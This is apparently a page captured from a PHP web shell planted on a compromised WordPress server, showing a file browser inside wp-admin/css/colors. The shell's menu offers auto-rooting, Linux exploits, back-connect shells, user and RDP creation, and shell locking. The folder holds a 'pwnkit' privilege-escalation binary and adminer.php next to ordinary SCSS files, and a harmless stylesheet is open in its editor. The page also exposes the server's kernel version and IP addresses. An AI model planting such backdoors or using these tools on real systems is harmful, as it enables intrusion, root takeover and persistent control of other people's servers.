Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.54
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
yvffpqmy /
public_html /
wp-admin /
css /
colors /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
blue
[ DIR ]
drwxr-xr-x
?;
coffee
[ DIR ]
drwxr-xr-x
?;
ectoplasm
[ DIR ]
drwxr-xr-x
?;
light
[ DIR ]
drwxr-xr-x
?;
midnight
[ DIR ]
drwxr-xr-x
?;
modern
[ DIR ]
drwxr-xr-x
?;
ocean
[ DIR ]
drwxr-xr-x
?;
sunrise
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
_admin.scss
22.49
KB
-rw-r--r--
_mixins.scss
945
B
-rw-r--r--
_variables.scss
2.51
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _mixins.scss
@use 'sass:color'; /* * Button mixin- creates a button effect with correct * highlights/shadows, based on a base color. */ @mixin button( $button-color, $button-text-color: #fff ) { background: $button-color; border-color: $button-color; color: $button-text-color; &:hover, &:focus { background: color.adjust($button-color, $lightness: 3%); border-color: color.adjust($button-color, $lightness: -3%); color: $button-text-color; } &:focus { box-shadow: 0 0 0 1px #fff, 0 0 0 3px $button-color; } &:active { background: color.adjust($button-color, $lightness: -5%); border-color: color.adjust($button-color, $lightness: -5%); color: $button-text-color; } &.active, &.active:focus, &.active:hover { background: $button-color; color: $button-text-color; border-color: color.adjust($button-color, $lightness: -15%); box-shadow: inset 0 2px 5px -3px color.adjust($button-color, $lightness: -50%); } }
Close